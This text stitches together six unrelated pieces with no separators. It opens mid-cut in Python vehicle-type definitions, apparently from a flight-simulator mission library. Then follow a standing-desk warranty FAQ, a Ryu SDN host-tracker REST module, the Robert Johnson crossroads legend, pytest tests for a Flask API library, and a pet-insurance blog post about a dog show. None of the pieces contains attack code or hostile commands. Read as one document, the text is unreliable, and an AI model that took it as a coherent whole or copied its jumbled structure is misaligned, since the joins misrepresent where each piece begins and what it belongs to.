Leopard-2A4 Trs" detection_range = 0 threat_range = 3500 air_weapon_dist = 1500 class VAB_Mephisto(unittype.VehicleType): id = "VAB_Mephisto" name = "ATGM VAB Mephisto" detection_range = 0 threat_range = 3800 air_weapon_dist = 3800 eplrs = True class ZTZ96B(unittype.VehicleType): id = "ZTZ96B" name = "ZTZ-96B" detection_range = 0 threat_range = 5000 air_weapon_dist = 3500 eplrs = True class ZBD04A(unittype.VehicleType): id = "ZBD04A" name = "ZBD-04A" detection_range = 0 threat_range = 4800 air_weapon_dist = 0 eplrs = True class Tiger_I(unittype.VehicleType): id = "Tiger_I" name = "HT Pz.Kpfw.VI Tiger I" detection_range = 0 threat_range = 3000 air_weapon_dist = 0 class Tiger_II_H(unittype.VehicleType): id = "Tiger_II_H" name = "HT Pz.Kpfw.VI Ausf. B Tiger II" detection_range = 0 threat_range = 6000 air_weapon_dist = 0 class Pz_V_Panther_G(unittype.VehicleType): id = "Pz_V_Panther_G" name = "MT Pz.Kpfw.V Panther Ausf.G" detection_range = 0 threat_range = 3000 air_weapon_dist = 0 class Jagdpanther_G1(unittype.VehicleType): id = "Jagdpanther_G1" name = "SPG Jagdpanther G1" detection_range = 0 threat_range = 5000 air_weapon_dist = 0 class JagdPz_IV(unittype.VehicleType): id = "JagdPz_IV" name = "SPG Jagdpanzer IV" detection_range = 0 threat_range = 3000 air_weapon_dist = 0 class Stug_IV(unittype.VehicleType): id = "Stug_IV" name = "SPG StuG IV" detection_range = 0 threat_range = 3000 air_weapon_dist = 0 class SturmPzIV(unittype.VehicleType): id = "SturmPzIV" name = "SPG Sturmpanzer IV Brummbar" detection_range = 0 threat_range = 4500 air_weapon_dist = 2500 class Sd_Kfz_234_2_Puma(unittype.VehicleType): id = "Sd_Kfz_234_2_Puma" name = "IFV Sd.Kfz.234/2 Puma" detection_range = 0 threat_range = 2000 air_weapon_dist = 0 class Stug_III(unittype.VehicleType): id = "Stug_III" name = "SPG StuG III Ausf. G" detection_range = 0 threat_range = 3000 air_weapon_dist = 0 class Elefant_SdKfz_184(unittype.VehicleType): id = "Elefant_SdKfz_184" name = "SPG Sd.Kfz.184 Elefant" detection_range = 0 threat_range = 6000 air_weapon_dist = 0 class Cromwell_IV(unittype.VehicleType): id = "Cromwell_IV" name = "CT Cromwell IV" detection_range = 0 threat_range = 3000 air_weapon_dist = 0 class M4A4_Sherman_FF(unittype.VehicleType): id = "M4A4_Sherman_FF" name = "MT M4A4 Sherman Firefly" detection_range = 0 threat_range = 3000 air_weapon_dist = 0 class Centaur_IV(unittype.VehicleType): id = "Centaur_IV" name = "CT Centaur IV" detection_range = 0 threat_range = 6000 air_weapon_dist = 0 class Churchill_VII(unittype.VehicleType): id = "Churchill_VII" name = "HIT Churchill VII" detection_range = 0 threat_range = 3000 air_weapon_dist = 0 class Daimler_AC(unittype.VehicleType): id = "Daimler_AC" name = "Car Daimler Armored" detection_range = 0 threat_range = 2000 air_weapon_dist = 0 class Tetrarch(unittype.VehicleType): id = "Tetrarch" name = "LT Mk VII Tetrarch" detection_range = 0 threat_range = 2000 air_weapon_dist = 0 class M10_GMC(unittype.VehicleType): id = "M10_GMC" name = "SPG M10 GMC" detection_range = 0 threat_range = 6000 air_weapon_dist = 0 class M8_Greyhound(unittype.VehicleType): id = "M8_Greyhound" name = "Car M8 Greyhound Armored" detection_range = 0 threat_range = 2000 air_weapon_dist = 0 class MissilesSS: class Scud_B(unittype.VehicleType): id = "Scud_B" name = "SSM SS-1C Scud-B" detection_range = 0 threat_range = 320000 air_weapon_dist = 320000 class Hy_launcher(unittype.VehicleType): id = "hy_launcher" name = "AShM SS-N-2 Silkworm" detection_range = 100000 threat_range = 100000 air_weapon_dist = 100000 class Silkworm_SR(unittype.VehicleType): id = "Silkworm_SR" name = "AShM Silkworm SR" detection_range = 200000 threat_range = 0 air_weapon_dist = 0 class V1_launcher(unittype.VehicleType): id = "v1_launcher" name = "SSM V-1 Launcher" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Locomotive: class Electric_locomotive(unittype.VehicleType): id = "Electric locomotive" name = "Loco VL80 Electric" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Locomotive(unittype.VehicleType): id = "Locomotive" name = "Loco CHME3T" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class ES44AH(unittype.VehicleType): id = "ES44AH" name = "Loco ES44AH" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class DRG_Class_86(unittype.VehicleType): id = "DRG_Class_86" name = "Loco DRG Class 86" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Carriage: class Coach_cargo(unittype.VehicleType): id = "Coach cargo" name = "Freight Van" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Coach_cargo_open(unittype.VehicleType): id = "Coach cargo open" name = "Open Wagon" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Coach_a_tank_blue(unittype.VehicleType): id = "Coach a tank blue" name = "Tank Car blue" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Coach_a_tank_yellow(unittype.VehicleType): id = "Coach a tank yellow" name = "Tank Car yellow" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Coach_a_passenger(unittype.VehicleType): id = "Coach a passenger" name = "Passenger Car" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Coach_a_platform(unittype.VehicleType): id = "Coach a platform" name = "Coach Platform" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Boxcartrinity(unittype.VehicleType): id = "Boxcartrinity" name = "Flatcar" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Tankcartrinity(unittype.VehicleType): id = "Tankcartrinity" name = "Tank Cartrinity" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Wellcarnsc(unittype.VehicleType): id = "Wellcarnsc" name = "Well Car" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class DR_50Ton_Flat_Wagon(unittype.VehicleType): id = "DR_50Ton_Flat_Wagon" name = "DR 50-ton flat wagon" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class German_covered_wagon_G10(unittype.VehicleType): id = "German_covered_wagon_G10" name = "Wagon G10 (Germany)" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class German_tank_wagon(unittype.VehicleType): id = "German_tank_wagon" name = "Tank Car (Germany)" detection_range = 0 threat_range = 0 air_weapon_dist = 0 vehicle_map = { "2B11 mortar": Artillery._2B11_mortar, "SAU Gvozdika": Artillery.SAU_Gvozdika, "SAU Msta": Artillery.SAU_Msta, "SAU Akatsia": Artillery.SAU_Akatsia, "SAU 2-C9": Artillery.SAU_2_C9, "M-109": Artillery.M_109, "SpGH_Dana": Artillery.SpGH_Dana, "AAV7": Armor.AAV7, "BMD-1": Armor.BMD_1, "BMP-1": Armor.BMP_1, "BMP-2": Armor.BMP_2, "BMP-3": Armor.BMP_3, "BRDM-2": Armor.BRDM_2, "BTR-80": Armor.BTR_80, "BTR_D": Armor.BTR_D, "Cobra": Armor.Cobra, "LAV-25": Armor.LAV_25, "M1043 HMMWV Armament": Armor.M1043_HMMWV_Armament, "M1045 HMMWV TOW": Armor.M1045_HMMWV_TOW, "M1126 Stryker ICV": Armor.M1126_Stryker_ICV, "M-113": Armor.M_113, "M1134 Stryker ATGM": Armor.M1134_Stryker_ATGM, "M-2 Bradley": Armor.M_2_Bradley, "MCV-80": Armor.MCV_80, "MTLB": Armor.MTLB, "Marder": Armor.Marder, "TPZ": Armor.TPZ, "Grad_FDDM": Artillery.Grad_FDDM, "Bunker": Fortification.Bunker, "Paratrooper RPG-16": Infantry.Paratrooper_RPG_16, "Paratrooper AKS-74": Infantry.Paratrooper_AKS_74, "Infantry AK Ins": Infantry.Infantry_AK_Ins, "Sandbox": Fortification.Sandbox, "Soldier AK": Infantry.Soldier_AK, "Infantry AK": Infantry.Infantry_AK, "Soldier M249": Infantry.Soldier_M249, "Soldier M4": Infantry.Soldier_M4, "Soldier M4 GRG": Infantry.Soldier_M4_GRG, "Soldier RPG": Infantry.Soldier_RPG, "MLRS FDDM": Artillery.MLRS_FDDM, "Grad-URAL": Artillery.Grad_URAL, "Uragan_BM-27": Artillery.Uragan_BM_27, "Smerch": Artillery.Smerch, "Smerch_HE": Artillery.Smerch_HE, "MLRS": Artillery.MLRS, "2S6 Tunguska": AirDefence._2S6_Tunguska, "Kub 2P25 ln": AirDefence.Kub_2P25_ln, "5p73 s-125 ln": AirDefence._5p73_s_125_ln, "S-300PS 5P85C ln": AirDefence.S_300PS_5P85C_ln, "S-300PS 5P85D ln": AirDefence.S_300PS_5P85D_ln, "SA-11 Buk LN 9A310M1": AirDefence.SA_11_Buk_LN_9A310M1, "Osa 9A33 ln": AirDefence.Osa_9A33_ln, "Tor 9A331": AirDefence.Tor_9A331, "Strela-10M3": AirDefence.Strela_10M3, "Strela-1 9P31": AirDefence.Strela_1_9P31, "SA-11 Buk CC 9S470M1": AirDefence.SA_11_Buk_CC_9S470M1, "SA-8 Osa LD 9T217": AirDefence.SA_8_Osa_LD_9T217, "Patriot AMG": AirDefence.Patriot_AMG, "Patriot ECS": AirDefence.Patriot_ECS, "Gepard": AirDefence.Gepard, "Hawk pcp": AirDefence.Hawk_pcp, "Vulcan": AirDefence.Vulcan, "Hawk ln": AirDefence.Hawk_ln, "M48 Chaparral": AirDefence.M48_Chaparral, "M6 Linebacker": AirDefence.M6_Linebacker, "Patriot ln": AirDefence.Patriot_ln, "M1097 Avenger": AirDefence.M1097_Avenger, "Patriot EPP": AirDefence.Patriot_EPP, "Patriot cp": AirDefence.Patriot_cp, "Roland ADS": AirDefence.Roland_ADS, "S-300PS 54K6 cp": AirDefence.S_300PS_54K6_cp, "Soldier stinger": AirDefence.Soldier_stinger, "Stinger comm dsr": AirDefence.Stinger_comm_dsr, "Stinger comm": AirDefence.Stinger_comm, "ZSU-23-4 Shilka": AirDefence.ZSU_23_4_Shilka, "ZU-23 Emplacement Closed": AirDefence.ZU_23_Emplacement_Closed, "ZU-23 Emplacement": AirDefence.ZU_23_Emplacement, "Ural-375 ZU-23": AirDefence.Ural_375_ZU_23, "ZU-23 Closed Insurgent": AirDefence.ZU_23_Closed_Insurgent, "Ural-375 ZU-23 Insurgent": AirDefence.Ural_375_ZU_23_Insurgent, "ZU-23 Insurgent": AirDefence.ZU_23_Insurgent, "SA-18 Igla manpad": AirDefence.SA_18_Igla_manpad, "SA-18 Igla comm": AirDefence.SA_18_Igla_comm, "SA-18 Igla-S manpad": AirDefence.SA_18_Igla_S_manpad, "SA-18 Igla-S comm": AirDefence.SA_18_Igla_S_comm, "Igla manpad INS": AirDefence.Igla_manpad_INS, "1L13 EWR": AirDefence._1L13_EWR, "Kub 1S91 str": AirDefence.Kub_1S91_str, "S-300PS 40B6M tr": AirDefence.S_300PS_40B6M_tr, "S-300PS 40B6MD sr": AirDefence.S_300PS_40B6MD_sr, "55G6 EWR": AirDefence._55G6_EWR, "S-300PS 64H6E sr": AirDefence.S_300PS_64H6E_sr, "SA-11 Buk SR 9S18M1": AirDefence.SA_11_Buk_SR_9S18M1, "Dog Ear radar": AirDefence.Dog_Ear_radar, "Hawk tr": AirDefence.Hawk_tr, "Hawk sr": AirDefence.Hawk_sr, "Patriot str": AirDefence.Patriot_str, "Hawk cwar": AirDefence.Hawk_cwar, "p-19 s-125 sr": AirDefence.P_19_s_125_sr, "Roland Radar": AirDefence.Roland_Radar, "snr s-125 tr": AirDefence.Snr_s_125_tr, "house1arm": Fortification.House1arm, "house2arm": Fortification.House2arm, "outpost_road": Fortification.Outpost_road, "outpost": Fortification.Outpost, "houseA_arm": Fortification.HouseA_arm, "TACAN_beacon": Fortification.TACAN_beacon, "Challenger2": Armor.Challenger2, "Leclerc": Armor.Leclerc, "M-60": Armor.M_60, "M1128 Stryker MGS": Armor.M1128_Stryker_MGS, "M-1 Abrams": Armor.M_1_Abrams, "T-55": Armor.T_55, "T-72B": Armor.T_72B, "T-80UD": Armor.T_80UD, "T-90": Armor.T_90, "Leopard1A3": Armor.Leopard1A3, "Merkava_Mk4": Armor.Merkava_Mk4, "Ural-4320 APA-5D": Unarmed.Ural_4320_APA_5D, "ATMZ-5": Unarmed.ATMZ_5, "ATZ-10": Unarmed.ATZ_10, "GAZ-3307": Unarmed.GAZ_3307, "GAZ-3308": Unarmed.GAZ_3308, "GAZ-66": Unarmed.GAZ_66, "M978 HEMTT Tanker": Unarmed.M978_HEMTT_Tanker, "HEMTT TFFT": Unarmed.HEMTT_TFFT, "IKARUS Bus": Unarmed.IKARUS_Bus, "KAMAZ Truck": Unarmed.KAMAZ_Truck, "LAZ Bus": Unarmed.LAZ_Bus, "LiAZ Bus": Unarmed.LiAZ_Bus, "Hummer": Unarmed.Hummer, "M 818": Unarmed.M_818, "MAZ-6303": Unarmed.MAZ_6303, "Predator GCS": Unarmed.Predator_GCS, "Predator TrojanSpirit": Unarmed.Predator_TrojanSpirit, "Suidae": Unarmed.Suidae, "Tigr_233036": Unarmed.Tigr_233036, "Trolley bus": Unarmed.Trolley_bus, "UAZ-469": Unarmed.UAZ_469, "Ural ATsP-6": Unarmed.Ural_ATsP_6, "Ural-4320-31": Unarmed.Ural_4320_31, "Ural-4320T": Unarmed.Ural_4320T, "Ural-375 PBU": Unarmed.Ural_375_PBU, "Ural-375": Unarmed.Ural_375, "VAZ Car": Unarmed.VAZ_Car, "ZiL-131 APA-80": Unarmed.ZiL_131_APA_80, "SKP-11": Unarmed.SKP_11, "ZIL-131 KUNG": Unarmed.ZIL_131_KUNG, "ZIL-4331": Unarmed.ZIL_4331, "KrAZ6322": Unarmed.KrAZ6322, "Electric locomotive": Locomotive.Electric_locomotive, "Locomotive": Locomotive.Locomotive, "Coach cargo": Carriage.Coach_cargo, "Coach cargo open": Carriage.Coach_cargo_open, "Coach a tank blue": Carriage.Coach_a_tank_blue, "Coach a tank yellow": Carriage.Coach_a_tank_yellow, "Coach a passenger": Carriage.Coach_a_passenger, "Coach a platform": Carriage.Coach_a_platform, "Scud_B": MissilesSS.Scud_B, "M4_Sherman": Armor.M4_Sherman, "M2A1_halftrack": Armor.M2A1_halftrack, "S_75M_Volhov": AirDefence.S_75M_Volhov, "SNR_75V": AirDefence.SNR_75V, "RLS_19J6": AirDefence.RLS_19J6, "ZSU_57_2": AirDefence.ZSU_57_2, "T-72B3": Armor.T_72B3, "BTR-82A": Armor.BTR_82A, "S-60_Type59_Artillery": AirDefence.S_60_Type59_Artillery, "generator_5i57": AirDefence.Generator_5i57, "ATZ-5": Unarmed.ATZ_5, "AA8": Unarmed.AA8, "PT_76": Armor.PT_76, "ATZ-60_Maz": Unarmed.ATZ_60_Maz, "ZIL-135": Unarmed.ZIL_135, "TZ-22_KrAZ": Unarmed.TZ_22_KrAZ, "Bedford_MWD": Unarmed.Bedford_MWD, "bofors40": AirDefence.Bofors40, "rapier_fsa_launcher": AirDefence.Rapier_fsa_launcher, "rapier_fsa_optical_tracker_unit": AirDefence.Rapier_fsa_optical_tracker_unit, "rapier_fsa_blindfire_radar": AirDefence.Rapier_fsa_blindfire_radar, "Land_Rover_101_FC": Unarmed.Land_Rover_101_FC, "Land_Rover_109_S3": Unarmed.Land_Rover_109_S3, "Chieftain_mk3": Armor.Chieftain_mk3, "hy_launcher": MissilesSS.Hy_launcher, "Silkworm_SR": MissilesSS.Silkworm_SR, "ES44AH": Locomotive.ES44AH, "Boxcartrinity": Carriage.Boxcartrinity, "Tankcartrinity": Carriage.Tankcartrinity, "Wellcarnsc": Carriage.Wellcarnsc, "Pz_IV_H": Armor.Pz_IV_H, "Sd_Kfz_251": Armor.Sd_Kfz_251, "flak18": AirDefence.Flak18, "Blitz_36-6700A": Unarmed.Blitz_36_6700A, "Leopard-2A5": Armor.Leopard_2A5, "Leopard-2": Armor.Leopard_2, "leopard-2A4": Armor.Leopard_2A4, "leopard-2A4_trs": Armor.Leopard_2A4_trs, "T155_Firtina": Artillery.T155_Firtina, "VAB_Mephisto": Armor.VAB_Mephisto, "ZTZ96B": Armor.ZTZ96B, "ZBD04A": Armor.ZBD04A, "HQ-7_LN_SP": AirDefence.HQ_7_LN_SP, "HQ-7_STR_SP": AirDefence.HQ_7_STR_SP, "PLZ05": Artillery.PLZ05, "Kubelwagen_82": Unarmed.Kubelwagen_82, "Sd_Kfz_2": Unarmed.Sd_Kfz_2, "Sd_Kfz_7": Unarmed.Sd_Kfz_7, "Horch_901_typ_40_kfz_21": Unarmed.Horch_901_typ_40_kfz_21, "Tiger_I": Armor.Tiger_I, "Tiger_II_H": Armor.Tiger_II_H, "Pz_V_Panther_G": Armor.Pz_V_Panther_G, "Jagdpanther_G1": Armor.Jagdpanther_G1, "JagdPz_IV": Armor.JagdPz_IV, "Stug_IV": Armor.Stug_IV, "SturmPzIV": Armor.SturmPzIV, "Sd_Kfz_234_2_Puma": Armor.Sd_Kfz_234_2_Puma, "flak30": AirDefence.Flak30, "flak36": AirDefence.Flak36, "flak37": AirDefence.Flak37, "flak38": AirDefence.Flak38, "KDO_Mod40": AirDefence.KDO_Mod40, "Flakscheinwerfer_37": AirDefence.Flakscheinwerfer_37, "Maschinensatz_33": AirDefence.Maschinensatz_33, "soldier_mauser98": Infantry.Soldier_mauser98, "SK_C_28_naval_gun": Fortification.SK_C_28_naval_gun, "fire_control": Fortification.Fire_control, "Stug_III": Armor.Stug_III, "Elefant_SdKfz_184": Armor.Elefant_SdKfz_184, "flak41": AirDefence.Flak41, "v1_launcher": MissilesSS.V1_launcher, "FuMG-401": AirDefence.FuMG_401, "FuSe-65": AirDefence.FuSe_65, "Cromwell_IV": Armor.Cromwell_IV, "M4A4_Sherman_FF": Armor.M4A4_Sherman_FF, "soldier_wwii_br_01": Infantry.Soldier_wwii_br_01, "Centaur_IV": Armor.Centaur_IV, "Churchill_VII": Armor.Churchill_VII, "Daimler_AC": Armor.Daimler_AC, "Tetrarch": Armor.Tetrarch, "QF_37_AA": AirDefence.QF_37_AA, "CCKW_353": Unarmed.CCKW_353, "Willys_MB": Unarmed.Willys_MB, "M12_GMC": Artillery.M12_GMC, "M30_CC": Unarmed.M30_CC, "soldier_wwii_us": Infantry.Soldier_wwii_us, "M10_GMC": Armor.M10_GMC, "M8_Greyhound": Armor.M8_Greyhound, "M4_Tractor": Unarmed.M4_Tractor, "M45_Quadmount": AirDefence.M45_Quadmount, "M1_37mm": AirDefence.M1_37mm, "DR_50Ton_Flat_Wagon": Carriage.DR_50Ton_Flat_Wagon, "DRG_Class_86": Locomotive.DRG_Class_86, "German_covered_wagon_G10": Carriage.German_covered_wagon_G10, "German_tank_wagon": Carriage.German_tank_wagon, }
We stand behind the quality of our desk frames, mechanisms, and electronics. In the rare event that you discover any defects or malfunctions in the desk frame, including the motor, metal/aluminum components, controller, switch, electronics, or anything else, let us know and we’ll make it right. Coverage begins on the day you receive your order, and applies to the original owner only. How do I request warranty service? Call us toll free at 1-800-349-3839 for warranty support. You can also email us at info@upliftdesk.com. When you contact us, please include your order number and an up-to-date shipping address. This will help us expedite the process, so you can get your issue fixed faster. If you bought from one of our resellers, you will need to contact the reseller directly and they will process your warranty request for you. My desktop is damaged! What do I do? If your desktop is unusable as a result of a manufacturer's defect or damage sustained in shipping, you are covered. In order for us to replace your desktop, we will need to provide the shipper with images of the damaged desktop and the shipping box. Please email these images with your warranty request to info@upliftdesk.com. If you received your desk by freight, you will need to sign that it was damaged upon delivery. Please take pictures of the box before disassembling the pallet, and submit them with your warranty request to info@upliftdesk.com. You do not need to reject the delivery. If your desktop is looking dull or scratched as a result of normal wear and tear, your warranty also covers expert advice from our woodworker on care and restoration for your desktop to keep it looking its best. I just got my frame, and there’s a problem with it. Can you help me? If any part of your frame arrives damaged, we will work to replace the needed part. Please look over the frame box to see if there is any damage, and determine if all components are in the package. If multiple parts of your frame have been damaged, the frame has been scratched, or a leg casing has opened and separated, we will replace the frame. To receive your replacement, place all the components you received back in the box, and approve a scheduled FedEx pickup. So UPLIFT Desks are covered for 7 years. What about accessories? If you receive any damaged or defective UPLIFT product, contact our warranty support team at 1-800-349-3839 or info@upliftdesk.com immediately. As with our desks, we warrant that our accessories are free from any defects in materials or workmanship. Coverage begins on the day you receive your order, and applies to the original owner only. The warranty terms for specific UPLIFT products are listed below. What am I getting when I ask for warranty service? Problems with our UPLIFT products are extremely rare, and we’re dedicated to making things right. We will replace items or parts at no cost to you, and ship them via standard ground service anywhere in the contiguous 48 United States for free, in most cases on the same or next business day. Expedited shipping is available at your expense. If you are outside the US48, you will be responsible for shipping charges only, regardless of method. Warranty support for UPLIFT solid wood desktops includes not just assessment of any issues that may arise, but also expert advice from our woodworker on how to care for your desktop to keep it looking its best. You will play a big part in the life of your solid wood or custom wood desktop. Handmade wood furniture requires some basic care and maintenance on your part to preserve its natural beauty and keep it in tip-top shape. Note: The UPLIFT Limited Warranty covers parts only, and does not include labor costs. Extended warranty purchases are non-refundable after the 30-day standard return policy window has closed. This warranty does not cover any problems which result from improper set-up, unauthorized modification, normal wear and tear, abuse, or force majeure, such as hurricane or floods. Imperfections that occur naturally, such as those sometimes found in reclaimed or solid wood desktops, do not qualify for repairs or replacements. With love and care, wood desktops age well, but they do age, and their look may change over time. The cost of repairing or replacing other property damaged in the event of an UPLIFT Desk product malfunctioning (consequential damages) and the cost of lost time or loss of use of your desk (incidental damages) are not recoverable under this warranty. Some states do not allow the exclusion or limitation of incidental or consequential damages, so this limitation or exclusion may not apply to you. What if I'm outside the warranty coverage? Feel free to contact us at 1-800-349-3839 or info@upliftdesk.com and we will advise you on steps you can take to remedy the problem. I bought a desk several years ago. Am I still covered? The standing warranties for current and previous UPLIFT Desk models are listed below. To ensure prompt and complete warranty support, please notify us of any issues, desktop defects, or damage that may have occurred in shipping within 30 days of receipt. Desktops require proper care and maintenance, and we recommend taking these steps to keep yours looking great. If you do have issues later down the road, we offer replacement desktops to existing customers at a reduced cost. Reach out to our Support Team to see your options for replacing your desktop.
# Copyright (C) 2014 SDN Hub # # Licensed under the GNU GENERAL PUBLIC LICENSE, Version 3. # You may not use this file except in compliance with this License. # You may obtain a copy of the License at # # http://www.gnu.org/licenses/gpl-3.0.txt # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # REST API # ############# Host tracker ############## # # get all hosts # GET /hosts # # get all hosts associated with a switch # GET /hosts/{dpid} # # import logging import json from webob import Response import time from ryu.base import app_manager from ryu.controller import ofp_event from ryu.controller.handler import MAIN_DISPATCHER from ryu.controller.handler import set_ev_cls from ryu.controller import dpset from ryu.app.wsgi import ControllerBase, WSGIApplication, route from ryu.lib.packet import packet from ryu.lib.packet import ethernet from ryu.lib.packet import ipv4 from ryu.ofproto import ether from ryu.ofproto import ofproto_v1_0, ofproto_v1_3 from ryu.app.sdnhub_apps import host_tracker from ryu.lib import dpid as dpid_lib class HostTrackerController(ControllerBase): def __init__(self, req, link, data, **config): super(HostTrackerController, self).__init__(req, link, data, **config) self.host_tracker = data['host_tracker'] self.dpset = data['dpset'] @route('hosts', '/v1.0/hosts', methods=['GET']) def get_all_hosts(self, req, **kwargs): return Response(status=200, content_type='application/json', body=json.dumps(self.host_tracker.hosts)) @route('hosts', '/v1.0/hosts/{dpid}', methods=['GET']) # requirements={'dpid': dpid_lib.DPID_PATTERN}) def get_hosts(self, req, dpid, **_kwargs): dp = self.dpset.get(int(dpid)) if dp is None: return Response(status=404) switch_hosts = {} for key, val in self.host_tracker.hosts.iteritems(): if val['dpid'] == dpid_lib.dpid_to_str(dp.id): switch_hosts[key] = val return Response(status=200, content_type='application/json', body=json.dumps(switch_hosts)) class HostTrackerRestApi(app_manager.RyuApp): OFP_VERSIONS = [ofproto_v1_0.OFP_VERSION, ofproto_v1_3.OFP_VERSION] _CONTEXTS = { 'dpset': dpset.DPSet, 'wsgi': WSGIApplication, 'host_tracker': host_tracker.HostTracker } def __init__(self, *args, **kwargs): super(HostTrackerRestApi, self).__init__(*args, **kwargs) dpset = kwargs['dpset'] wsgi = kwargs['wsgi'] host_tracker = kwargs['host_tracker'] self.data = {} self.data['dpset'] = dpset self.data['waiters'] = {} self.data['host_tracker'] = host_tracker wsgi.register(HostTrackerController, self.data) #mapper = wsgi.mapper # mapper.connect('hosts', '/v1.0/hosts', controller=HostTrackerController, action='get_all_hosts', # conditions=dict(method=['GET'])) # mapper.connect('hosts', '/v1.0/hosts/{dpid}', controller=HostTrackerController, action='get_hosts', # conditions=dict(method=['GET']), requirements={'dpid': dpid_lib.DPID_PATTERN})
According to a legend known to modern Blues fans, Robert Johnson was a young black man living on a plantation in rural Mississippi. Branded with a burning desire to become a great blues musician, he was instructed to take his guitar to a crossroad near Dockery's plantation at midnight. There he was met by a large black man (the Devil) who took the guitar from Johnson and tuned it, giving him mastery of the guitar, and handed it back to him in return for his soul. In exchange Robert Johnson became able to play, sing, and create the greatest blues anyone had ever heard.
import pytest import json from mock import patch from werkzeug.exceptions import BadRequest from arrested import ( Handler, Endpoint, ResponseHandler, RequestHandler, JSONRequestMixin, JSONResponseMixin) def test_handler_params_set(): endpoint = Endpoint() handler = Handler(endpoint, payload_key='foo', **{'test': 'foo'}) assert handler.endpoint == endpoint assert handler.payload_key == 'foo' assert handler.params == {'test': 'foo'} def test_handler_handle_method_basic(): """By default the hanlde method simply returns the data passed to it. """ endpoint = Endpoint() handler = Handler(endpoint) resp = handler.handle({'foo': 'bar'}) assert resp == {'foo': 'bar'} def test_handler_process_method_calls_handle(): endpoint = Endpoint() handler = Handler(endpoint) with patch.object(Handler, 'handle') as _mock: handler.process({'foo': 'bar'}) _mock.assert_called_once_with({'foo': 'bar'}) def test_handler_process_method_response(): endpoint = Endpoint() handler = Handler(endpoint) resp = handler.process({'foo': 'bar'}) assert resp == handler assert resp.data == {'foo': 'bar'} def test_response_handler_handle_method(app): endpoint = Endpoint() handler = ResponseHandler(endpoint) with app.test_request_context('/test', method='GET'): resp = handler.process({'foo': 'bar'}) assert resp == handler assert resp.data == {'foo': 'bar'} def test_response_handler_get_response_data(app): endpoint = Endpoint() handler = ResponseHandler(endpoint) with app.test_request_context('/test', method='GET'): resp = handler.process({'foo': 'bar'}) assert resp == handler assert resp.data == {'foo': 'bar'} def test_request_handler_handle_method(): endpoint = Endpoint() handler = RequestHandler(endpoint) # as we're passing data directly to process() the get_request_data() method will not # be called so the incoming data is not required to be in JSON format. resp = handler.process({'foo': 'bar'}) assert resp == handler assert resp.data == {'foo': 'bar'} def test_request_handler_handle_method_request_data(app): endpoint = Endpoint() handler = RequestHandler(endpoint) with app.test_request_context( '/test', data=json.dumps({'foo': 'bar'}), headers={'content-type': 'application/json'}, method='POST'): resp = handler.process() assert resp == handler assert resp.data == {'foo': 'bar'} def test_json_request_mixin_valid_json_request(app): mixin = JSONRequestMixin() with app.test_request_context( '/test', data=json.dumps({'foo': 'bar'}), headers={'content-type': 'application/json'}, method='POST'): resp = mixin.get_request_data() assert resp == {'foo': 'bar'} def test_json_request_mixin_invalid_json(app): endpoint = Endpoint() mixin = JSONRequestMixin() mixin.endpoint = endpoint with app.test_request_context( '/test', data=b'not valid', headers={'content-type': 'application/json'}, method='POST'): with pytest.raises(BadRequest): mixin.get_request_data() def test_json_response_mixin(app): mixin = JSONResponseMixin() mixin.payload_key = 'data' mixin.data = {'foo': 'bar'} assert mixin.get_response_data() == json.dumps({"data": {"foo": "bar"}})
Emerald Life was at the Victoria Park Dog Show recently, organised by All About Dogs. It was great to see so many dog-owners and wannabe dog-owners, having fun, chatting and watching the shows and competitions. The dogs were just as friendly as their owners, and with tens of dogs running around, the atmosphere was great. One dog in particular caught my eye, or rather one collar. It is important when we own dogs that we signal to strangers how friendly (or not) our dog is. The rule is: always best to first ask an owner if you can pet their dog, and it is an important lesson for children to learn and understand rather than barrelling towards a dog that may be nervous. Many of you will know that a yellow collar on a dog means ‘nervous’, although the better collars have that written on them. This weekend was the first time that I have seen a green ‘friendly’ collar. I spoke to the owners about this lovely little chap Monty. He is a rescue dog and could not have been more eager to make new friends. The reason for a green collar is that many people get nervous around certain breeds that have a perceived bad reputation, like Staffordshire Bull Terriers (such as Monty), Bull Terriers, Dobermans etc., all of which can be sweet and loving dogs with the right homes. Lots of people don’t want to come over and say hello to the dog, which is itself a shame, and the dog can feel unsettled because of the nervous vibe being given out. But no dog is sweet and lovely all the time. What do you do when your dog bites or causes damage? It can happen even with the best-trained dogs if tired or provoked. If your dog runs off and causes a car accident, the bill can be thousands, and even more if medical treatment is required. By law (under various pieces of legislation) an owner may be liable for the actions of their dog (cats are not covered!) if the dog is ‘out-of-control’, which can be broadly interpreted. We all know our dogs – and sometimes they do things they shouldn’t. You can’t change that, but you should have insurance for that event. Good dog policies should have a decent level of third party cover. The Emerald Life pet policy has third party liability cover up to £1,000,000 per event, covering both property damage and injury or death. Of course, as responsible dog owners one should have a pet policy that includes a suitable level of third party liability cover for you and your dog. If you don’t or if you fancy just doing a price check, you can check out Emerald’s pet policy here. We all love our dogs and it’s just good to have that extra peace of mind.
